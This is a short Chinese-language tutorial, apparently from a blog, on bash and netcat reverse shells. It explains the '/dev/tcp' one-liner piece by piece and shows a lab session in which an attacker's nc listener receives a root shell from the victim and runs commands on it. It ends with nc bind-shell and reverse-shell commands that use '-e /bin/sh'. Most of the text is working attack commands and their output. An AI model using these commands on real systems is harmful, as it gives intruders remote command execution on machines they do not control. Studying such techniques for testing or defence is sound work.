一、介绍
bash反射就是反弹一个交互的shell,类似ssh连接,可以执行命令
二、使用命令
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i 是打开一个交互的bash
>& 是将标准错误输出定向到标准输出中。
/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
0>&1 是将标准输入重定向到标准输出中。
三、实战测试
攻击端
##安装nc yum install nc -y #使用nc打开一个端口(我这使用80) [root@server ~]# nc -v -l -p 80 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80
被攻击端
[root@localhost~]#/bin/bash -i >& /dev/tcp/10.0.0.1/80 0>&1
查看攻击端
[root@server ~]# nc -v -l -p 80 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from 10.0.0.141. Ncat: Connection from 10.0.0.141:56507. [root@localhost~]# //变成了被攻击端的界面 #执行命令测试 [root@localhost~]#pwd pwd /root [root@localhost~]#hostname hostname localhost.localdomain [root@localhost~]#ll /^H
nc正向连接
被攻击端: nc -lvp 8080 -e /bin/sh 攻击端: nc -nvl 10.0.0.138 8080
nc反向连接
攻击端:nc 10.0.0.138 8080 被攻击端: nc -vv 10.0.0.132 8080 -e /bin/sh